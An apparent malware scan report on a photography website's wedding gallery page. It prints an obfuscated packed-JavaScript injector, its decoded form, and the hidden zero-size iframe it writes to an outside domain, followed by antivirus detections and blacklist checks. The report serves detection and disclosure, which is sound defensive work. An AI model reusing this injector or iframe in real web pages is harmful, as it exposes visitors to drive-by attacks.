BitDefender
JS:Trojan.Crypt.JC

http://www.leighannhoodphotography.com/gallery/weddings
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Dec 2014 12:52:51 GMT
Location: http://www.leighannhoodphotography.com/gallery/weddings/
Server: nginx/1.6.2
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.leighannhoodphotography.com/xmlrpc.php
clean
http://www.leighannhoodphotography.com/gallery/weddings/
200 OK
Content-Length: 48317
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 c="x+/=";7 1="z/B=";7 5="";7 j,k,e,d,a,8,b="";7 i=0;7 t=/[^A-q-p-9\\+\\/\\=]/g;1=1.D(/[^A-q-p-9\\+\\/\\=]/g,"");s{d=c.f(1.h(i++));a=c.f(1.h(i++));8=c.f(1.h(i++));
... 102 bytes are skipped ...
|b;5=5+l.m(j);n(8!=o){5=5+l.m(k)}n(b!=o){5=5+l.m(e)}j=k=e="";d=a=8=b=""}y(i<1.C);u.r(v(5));',40,40,'|s5fA||||P3yL||var|toUe||ZEPX|K0oj|k0e0y0S|aiJg|EqVD|indexOf||charAt||wzQl|DwS9|String|fromCharCode|if|64|z0|Za|write|do|base64test|document|unescape|15|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|while|PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA||c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4|length|replace'.split('|'),0,{}))

Decoded script:


var k0e0y0S="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var s5fA="PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA/c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4=";var P3yL="";var wzQl,DwS9,EqVD,aiJg,ZEPX,toUe,K0oj="";var i=0;var base64test=/[^A-Za-z0-9\+\/\=]/g;s5fA=s5fA.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{aiJg=k0e0y0S.indexOf(s5fA.charAt(i++));ZEPX=k0e0y0S.indexOf(s5fA.charAt(i++));toUe=k0e0y0S.indexOf(s5fA.charAt(i++));
... 898 bytes are skipped ...
.indexOf(s5fA.charAt(i++));wzQl=(aiJg<<2)|(ZEPX>>4);DwS9=((ZEPX&15)<<4)|(toUe>>2);EqVD=((toUe&3)<<6)|K0oj;P3yL=P3yL+String.fromCharCode(wzQl);if(toUe!=64){P3yL=P3yL+String.fromCharCode(DwS9)}if(K0oj!=64){P3yL=P3yL+String.fromCharCode(EqVD)}wzQl=DwS9=EqVD="";aiJg=ZEPX=toUe=K0oj=""}while(i<s5fA.length);document.write(unescape(P3yL));
<iframe src="http://wow-gamegold.com/photos/go.php?sid=2" width="0" height="0" frameborder="0"></iframe>

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
HTML:Iframe-LX [Trj]
Ad-Aware
JS:Trojan.Crypt.JC
Ikarus
Trojan.IframeRef
nProtect
JS:Trojan.Crypt.JC
TrendMicro-HouseCall
TROJ_GEN.F47V0209
Emsisoft
JS:Trojan.Crypt.JC (B)
Microsoft
Exploit:HTML/IframeRef.AA
Kaspersky
Trojan.JS.Iframe.fa
MicroWorld-eScan
JS:Trojan.Crypt.JC
Fortinet
JS/Iframe.FA!tr
NANO-Antivirus
Trojan.Script.Agent.sbnf
F-Secure
JS:Trojan.Crypt.JC
Norman
IframeRef.DM
GData
JS:Trojan.Crypt.JC
BitDefender
JS:Trojan.Crypt.JC


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: leighannhoodphotography.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: leighannhoodphotography.com
Referer: http://www.google.com/search?q=leighannhoodphotography.com

Result:
The result is similar to the first query. No suspicious redirects were found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=leighannhoodphotography.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://leighannhoodphotography.com/

Result: leighannhoodphotography.com is not infected or malware details are not published yet.